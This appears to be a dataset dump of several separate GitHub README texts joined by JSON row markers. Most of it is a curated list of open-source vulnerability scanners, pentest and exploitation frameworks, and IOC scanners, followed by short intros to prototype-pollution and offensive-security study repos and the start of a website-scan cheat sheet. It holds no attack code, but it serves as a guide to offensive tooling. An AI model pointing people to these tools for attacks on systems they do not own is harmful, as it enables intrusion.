![GitHub](https://img.shields.io/github/license/zhangzhenfeng/AnyScan?style=flat-square)\n\n- https://github.com/Tuhinshubhra/RED_HAWK - **An all In one tool For information gathering, SQL vulnerability scanning and crawling, coded In PHP**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Tuhinshubhra/RED_HAWK?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Tuhinshubhra/RED_HAWK?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Tuhinshubhra/RED_HAWK?style=flat-square) ![GitHub](https://img.shields.io/github/license/Tuhinshubhra/RED_HAWK?style=flat-square)\n\n- https://github.com/swisskyrepo/DamnWebScanner - **Another web vulnerabilities scanner, this extension works on Chrome and Opera**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/swisskyrepo/DamnWebScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/swisskyrepo/DamnWebScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/swisskyrepo/DamnWebScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/swisskyrepo/DamnWebScanner?style=flat-square)\n\n- https://github.com/anilbaranyelken/tulpar - **Web Vulnerability Scanner written in Python,supported multiple web vulnerabilities scan**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/anilbaranyelken/tulpar?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/anilbaranyelken/tulpar?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/anilbaranyelken/tulpar?style=flat-square) ![GitHub](https://img.shields.io/github/license/anilbaranyelken/tulpar?style=flat-square)\n\n- https://github.com/Yukinoshita47/Yuki-Chan-The-Auto-Pentest - **An automated penetration testing tool this tool will auditing all standard security test method for you**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Yukinoshita47/Yuki-Chan-The-Auto-Pentest?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Yukinoshita47/Yuki-Chan-The-Auto-Pentest?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Yukinoshita47/Yuki-Chan-The-Auto-Pentest?style=flat-square) ![GitHub](https://img.shields.io/github/license/Yukinoshita47/Yuki-Chan-The-Auto-Pentest?style=flat-square)\n\n- https://github.com/0xsauby/yasuo - **ruby script that scans for vulnerable & exploitable 3rd-party web applications on a network**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Ruby-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/0xsauby/yasuo?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/0xsauby/yasuo?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/0xsauby/yasuo?style=flat-square) ![GitHub](https://img.shields.io/github/license/0xsauby/yasuo?style=flat-square)\n\n- https://github.com/hatRiot/clusterd - **application server attack toolkit**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/hatRiot/clusterd?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/hatRiot/clusterd?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/hatRiot/clusterd?style=flat-square) ![GitHub](https://img.shields.io/github/license/hatRiot/clusterd?style=flat-square)\n\n- https://github.com/erevus-cn/pocscan - **Open source and distributed web vulnerability scanning framework**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/erevus-cn/pocscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/erevus-cn/pocscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/erevus-cn/pocscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/erevus-cn/pocscan?style=flat-square)\n\n- https://github.com/TophantTechnology/osprey - **Distributed web vulnerability scanning framework**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/TophantTechnology/osprey?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/TophantTechnology/osprey?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/TophantTechnology/osprey?style=flat-square) ![GitHub](https://img.shields.io/github/license/TophantTechnology/osprey?style=flat-square)\n\n- https://github.com/yangbh/Hammer - **A web vulnerability scanner framework**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/yangbh/Hammer?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/yangbh/Hammer?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/yangbh/Hammer?style=flat-square) ![GitHub](https://img.shields.io/github/license/yangbh/Hammer?style=flat-square)\n\n- https://github.com/Lucifer1993/AngelSword - **Web vulnerability scanner framework based on python3**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Lucifer1993/AngelSword?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Lucifer1993/AngelSword?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Lucifer1993/AngelSword?style=flat-square) ![GitHub](https://img.shields.io/github/license/Lucifer1993/AngelSword?style=flat-square)\n\n- https://github.com/zaproxy/zaproxy - **One of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/zaproxy/zaproxy?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/zaproxy/zaproxy?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/zaproxy/zaproxy?style=flat-square) ![GitHub](https://img.shields.io/github/license/zaproxy/zaproxy?style=flat-square)\n\n- https://github.com/s0md3v/Striker - **Striker is an offensive information and vulnerability scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/s0md3v/Striker?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/s0md3v/Striker?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/s0md3v/Striker?style=flat-square) ![GitHub](https://img.shields.io/github/license/s0md3v/Striker?style=flat-square)\n\n- https://github.com/dermotblair/webvulscan - **Written in PHP and can be used to test remote, or local, web applications for security vulnerabilities**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/dermotblair/webvulscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/dermotblair/webvulscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/dermotblair/webvulscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/dermotblair/webvulscan?style=flat-square)\n> \n- https://github.com/alienwithin/OWASP-mth3l3m3nt-framework - **Penetration testing aiding tool and exploitation framework**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/alienwithin/OWASP-mth3l3m3nt-framework?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/alienwithin/OWASP-mth3l3m3nt-framework?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/alienwithin/OWASP-mth3l3m3nt-framework?style=flat-square) ![GitHub](https://img.shields.io/github/license/alienwithin/OWASP-mth3l3m3nt-framework?style=flat-square)\n\n- https://github.com/toyakula/luna - **An open-source web security scanner which is based on reduced-code passive scanning framework**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/toyakula/luna?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/toyakula/luna?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/toyakula/luna?style=flat-square) ![GitHub](https://img.shields.io/github/license/toyakula/luna?style=flat-square)\n\n- https://github.com/Manisso/fsociety - **A Penetration Testing Framework including Information Gathering,Wireless Testing,Web Hacking and so on**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Manisso/fsociety?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Manisso/fsociety?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Manisso/fsociety?style=flat-square) ![GitHub](https://img.shields.io/github/license/Manisso/fsociety?style=flat-square)\n\n- https://github.com/boy-hack/w9scan - **A web vulnerability scanner framework,running with 1200+ plugins**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/boy-hack/w9scan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/boy-hack/w9scan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/boy-hack/w9scan?style=flat-square) ![GitHub](https://img.shields.io/github/license/boy-hack/w9scan?style=flat-square)\n\n- https://github.com/YalcinYolalan/WSSAT - **Web service security assessment tool,provide simple .exe application to use based on Windows OS**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-CSharp-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/YalcinYolalan/WSSAT?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/YalcinYolalan/WSSAT?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/YalcinYolalan/WSSAT?style=flat-square) ![GitHub](https://img.shields.io/github/license/YalcinYolalan/WSSAT?style=flat-square)\n\n- https://github.com/AmyangXYZ/AssassinGo - **An extenisble and concurrency pentest framework in Go**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/AmyangXYZ/AssassinGo?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/AmyangXYZ/AssassinGo?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/AmyangXYZ/AssassinGo?style=flat-square) ![GitHub](https://img.shields.io/github/license/AmyangXYZ/AssassinGo?style=flat-square)\n\n- https://github.com/joker25000/Optiva-Framework - **Web Application Scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/joker25000/Optiva-Framework?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/joker25000/Optiva-Framework?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/joker25000/Optiva-Framework?style=flat-square) ![GitHub](https://img.shields.io/github/license/joker25000/Optiva-Framework?style=flat-square)\n\n- https://github.com/theInfectedDrake/TIDoS-Framework - **The offensive web application penetration testing framework**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/theInfectedDrake/TIDoS-Framework?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/theInfectedDrake/TIDoS-Framework?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/theInfectedDrake/TIDoS-Framework?style=flat-square) ![GitHub](https://img.shields.io/github/license/theInfectedDrake/TIDoS-Framework?style=flat-square)\n\n- https://github.com/TideSec/WDScanner - **A full-featured vulnerability scanner for enterprise security**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/TideSec/WDScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/TideSec/WDScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/TideSec/WDScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/TideSec/WDScanner?style=flat-square)\n\n- https://github.com/j3ssie/Osmedeus - **Fully automated offensive security tool for reconnaissance and vulnerability scanning**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/j3ssie/Osmedeus?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/j3ssie/Osmedeus?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/j3ssie/Osmedeus?style=flat-square) ![GitHub](https://img.shields.io/github/license/j3ssie/Osmedeus?style=flat-square)\n\n- https://github.com/jeffzh3ng/Fuxi-Scanner - **Open source network security vulnerability scanner with asset discovery & management**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/jeffzh3ng/Fuxi-Scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/jeffzh3ng/Fuxi-Scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/jeffzh3ng/Fuxi-Scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/jeffzh3ng/Fuxi-Scanner?style=flat-square)\n\n- https://github.com/knownsec/Pocsuite - **Open-sourced remote vulnerability testing framework**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/knownsec/Pocsuite?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/knownsec/Pocsuite?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/knownsec/Pocsuite?style=flat-square) ![GitHub](https://img.shields.io/github/license/knownsec/Pocsuite?style=flat-square)\n\n- https://github.com/opensec-cn/kunpeng - **An open source POC framework written by Golang that provides various language calls in the form of a dynamic link library**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/opensec-cn/kunpeng?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/opensec-cn/kunpeng?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/opensec-cn/kunpeng?style=flat-square) ![GitHub](https://img.shields.io/github/license/opensec-cn/kunpeng?style=flat-square)\n\n- https://github.com/jaeles-project/jaeles - **The Swiss Army knife for automated Web Application Testing**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/jaeles-project/jaeles?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/jaeles-project/jaeles?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/jaeles-project/jaeles?style=flat-square) ![GitHub](https://img.shields.io/github/license/jaeles-project/jaeles?style=flat-square)\n\n- https://github.com/TideSec/Mars - **The totally new generation of WDScanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/TideSec/Mars?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/TideSec/Mars?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/TideSec/Mars?style=flat-square) ![GitHub](https://img.shields.io/github/license/TideSec/Mars?style=flat-square)\n\n- https://github.com/knassar702/scant3r - **Yet another web security scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/knassar702/scant3r?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/knassar702/scant3r?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/knassar702/scant3r?style=flat-square) ![GitHub](https://img.shields.io/github/license/knassar702/scant3r?style=flat-square)\n\n- https://github.com/google/tsunami-security-scanner - **A general purpose network security scanner with an extensible plugin system for detecting high severity vulnerabilities with high confidenc by Google**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/google/tsunami-security-scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/google/tsunami-security-scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/google/tsunami-security-scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/google/tsunami-security-scanner?style=flat-square)\n\n- https://github.com/er10yi/MagiCude - **A scanner based on the Spring Boot micro-service,supports distributed port (vulnerability) scanning, asset security management, real-time threat monitoring and notification, vulnerability lifecycle, vulnerability wiki, email notification, etc**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/er10yi/MagiCude?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/er10yi/MagiCude?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/er10yi/MagiCude?style=flat-square) ![GitHub](https://img.shields.io/github/license/er10yi/MagiCude?style=flat-square)\n\n- https://github.com/projectdiscovery/nuclei - **A fast tool for configurable targeted vulnerability scanning based on templates offering massive extensibility**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/projectdiscovery/nuclei?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/projectdiscovery/nuclei?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/projectdiscovery/nuclei?style=flat-square) ![GitHub](https://img.shields.io/github/license/projectdiscovery/nuclei?style=flat-square)\n\n- https://github.com/ysrc/xunfeng - **Vulnerability rapid response,scanning system for intranet**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ysrc/xunfeng?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ysrc/xunfeng?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ysrc/xunfeng?style=flat-square) ![GitHub](https://img.shields.io/github/license/ysrc/xunfeng?style=flat-square)\n\n- https://github.com/TophantTechnology/ARL - **An agile asset reconnaissance system**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/TophantTechnology/ARL?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/TophantTechnology/ARL?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/TophantTechnology/ARL?style=flat-square) ![GitHub](https://img.shields.io/github/license/TophantTechnology/ARL?style=flat-square)\n\n- https://github.com/smallcham/sec-admin - **SEC can be used for enterprises to scan and check the security of server resources which has strong controllability, supports distributed multi-node deployment**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/smallcham/sec-admin?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/smallcham/sec-admin?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/smallcham/sec-admin?style=flat-square) ![GitHub](https://img.shields.io/github/license/smallcham/sec-admin?style=flat-square)\n\n- https://github.com/olacabs/jackhammer - **One Security vulnerability assessment/management tool to solve all the security team problems**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/olacabs/jackhammer?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/olacabs/jackhammer?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/olacabs/jackhammer?style=flat-square) ![GitHub](https://img.shields.io/github/license/olacabs/jackhammer?style=flat-square)\n\n- https://github.com/bigblackhat/oFx - **Vulnerability verification framework, corporate assets analysis and rapid scanner for 1day vulnerability**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/bigblackhat/oFx?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/bigblackhat/oFx?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/bigblackhat/oFx?style=flat-square) ![GitHub](https://img.shields.io/github/license/bigblackhat/oFx?style=flat-square)\n\n\n### Advanced Persistent Threat Detect\n\n- https://github.com/Neo23x0/Loki - **Simple IOC and Incident Response Scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Neo23x0/Loki?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Neo23x0/Loki?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Neo23x0/Loki?style=flat-square) ![GitHub](https://img.shields.io/github/license/Neo23x0/Loki?style=flat-square)\n\n- https://github.com/Neo23x0/Fenrir - **Simple IOC and Incident Response Scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-BashShell-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Neo23x0/Fenrir?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Neo23x0/Fenrir?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Neo23x0/Fenrir?style=flat-square) ![GitHub](https://img.shields.io/github/license/Neo23x0/Fenrir?style=flat-square)\n\n\n***\n## Why Create This Collection?\n\nThe purpose of this collection is to provide various types of open-source security scanners that can help companies to be more safer.\n\n## Commit Symbolic Description\n\n**[↑scanner]xxx** means **update scanner info**
\n**[+scanner]xxx** means **add scanner**
\n**[-scanner]xxx** means **remove scanner**
\n**[+category]xxx** means **add scanner category**
\n**[-category]xxx** means **remove scanner category**
\n**[+contributor]xxx** means **add someone to acknowledgments**
\n**[↑contributor]xxx** means **update someone's info for acknowledgments**
\n**[↑other]xxx** means **other actions**
\n\n## Authors\n\n**Wester**(Twitter @Zhiyang Zeng) & **Martin**(Twitter @Martin Chow)\n\n## Legal Disclaimer\n\nThe scanners provided by this project are for research and study purposes only, and you must obey the laws and regulations of your country during use. If you are a Chinese citizen, please ensure you are obedient to *The Cyber Security Law of the People's Republic of China*, and please do not break the article 286 of *the Criminal Law of the People's Republic of China* for the regulation on the crime of destroying computer systems. At last, I would like to point out to you that you must be fully held responsible duty for any consequence that may arise.\n\n## How to contribute?\n\nIf you have any questions about this project ,or you have found some valuable scanners, please feel free to tell us :)\n\n## License\n\nThe content of this Repository is released under the [](https://creativecommons.org/licenses/by-nc-nd/4.0/deed.en) license.\n\n## Copyright\n\nIt's happy to see that this repository has been widely spreaded in information security community, but I hope everyone could at all times respect knowledge and our efforts, so please specify reproduced from https://github.com/We5ter/Scanners-Box in your articles, and please do not republish this article for profit.\n\n## Acknowledgments\n\nWe would like to thanks the following security researchers for their valuable feedbacks amd suggestions.\n\n- **@0c0c0f**\n- **@藏形匿影**\n- **@Mottoin team**\n- **@BlackHole**\n- **@CodeColorist**\n- **@3xp10it**\n- **@re4lity**\n- **@s0md3v**\n- **@boy-hack**\n- **@marsII**\n- **@tom0li**\n- **@hksanduo**\n- **@alexlauerman**\n- **@MedivhMT**\n- **@TideSec**\n- **@0xHJK**\n- **@j3ssie**\n- **@Luci-d**\n- **@cnlnn**\n- **@yunxu1**\n- **@saeeddhqan**\n- **@Sofiane Lounici**\n- **Owen Garrettz@deepfence**\n\n## Stargazers\n\n[![Stargazers over time](https://starchart.cc/We5ter/Scanners-Box.svg)](https://starchart.cc/We5ter/Scanners-Box)\n\n&copy;Monster Zero Team 2023\n"}}},{"rowIdx":306,"cells":{"text":{"kind":"string","value":"## What's this repository about?\n\nThis repository tries to explain what Prototype Pollution is and will try to give you a few examples on how to use it in certain use-cases.\n\n - [What is prototype pollution?](/prototype-pollution.md)\n - [Gunship (HackTheBox challenge) based on Prototype Pollution.](/gunship-walkthrough.md)\n\n## License\n**Please note:\nThe Gunship challenge source code included in this repo is attributed to HackTheBox (https://www.hackthebox.com/).**\n\nMy write-ups and notes are published under [Creative Commons BY-NC-SA 4.0 license](https://creativecommons.org/licenses/by-nc-sa/4.0/). Which says, \"This license lets others remix, tweak, and build upon your work non-commercially, as long as they credit you and license their new creations under the identical terms.\"\n\n![CC BY-NC-SA license](https://mirrors.creativecommons.org/presskit/buttons/88x31/png/by-nc-sa.png) \n\n"}}},{"rowIdx":307,"cells":{"text":{"kind":"string","value":"# #pwd: \n#/lifesfun101/Offensive_Security\n\n# #whoami\n\nI'm a young information security professional who enjoys tough problems to solve and new challenges to take on. I have graduated from college with Information Security Degree and have always been fascinated with this area of Information Technology. In the past I have been on the defensive side of security, working in a Security Operations Center as a Security Analyst.\n\nSo far I have 2 certificates under my belt which are OSCP and CISSP (Associate). I enjoy a good challenging box from hackthebox and from vulnhub. I follow many security pages on reddit and attend local security meetups.\n\n# #man\nThis repository is dedicated to offensive security. I started my journey on that path in February, 2019. \nI don't claim to be an expert in this field. I'm just an enthusiast who would like to help others on the same journey. Throughout this repository I will be sharing things I found useful myself. These \"things\" will include:\n* variety of tools \n* variety of tactics \n* variety scripts I wrote\n* variety of scripts someone else wrote and I found useful (with appropriate creditation) \n* [walkthrough](https://github.com/lifesfun101/Offensive-Security/tree/master/Walkthroughs) tutorials to vulnerable systems from Vulnhub and HackTheBox\n* links to other pages that I stumbled upon in my journey and found helpful \n* and other [helpful material](https://github.com/lifesfun101/Offensive-Security/tree/master/Helpful%20Material)\n\nCurrently I am working on [OSCP Preparation Manual](https://github.com/lifesfun101/Offensive-Security/blob/master/Helpful%20Material/OSCP%20Preparation%20Manual.md)\n\nI really hope my contributions on this page will help others along the way and save them quite some time as well\n"}}},{"rowIdx":308,"cells":{"text":{"kind":"string","value":"# Website scan\r\n\r\n**Summery:**\r\n\r\n- [Website scan](#website-scan)\r\n - [Nmap](#nmap)\r\n - [Scan for cms](#scan-for-cms)\r\n - [WebSite Scanning](#website-scanning)\r\n - [Dico list](#dico-list)\r\n - [Commands](#commands)\r\n - [Check for backup files](#check-for-backup-files)\r\n - [403 